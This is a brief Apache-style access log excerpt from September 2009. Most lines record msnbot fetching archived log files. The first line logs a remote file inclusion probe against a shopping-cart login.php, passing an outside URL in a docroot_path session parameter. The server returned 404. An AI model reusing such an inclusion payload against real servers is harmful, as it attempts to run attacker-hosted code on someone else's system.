206.225.23.4 - - [06/Sep/2009:22:55:05 -0500] "GET /logs/access_log.1241654400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
65.55.106.179 - - [06/Sep/2009:22:57:11 -0500] "GET /logs/access_log.1186790400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.126 - - [06/Sep/2009:22:58:02 -0500] "GET /logs/access_log.1201996800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.139 - - [06/Sep/2009:22:58:03 -0500] "GET /logs/access_log.1136073600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.136 - - [06/Sep/2009:22:58:03 -0500] "GET /logs/access_log.1167782400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
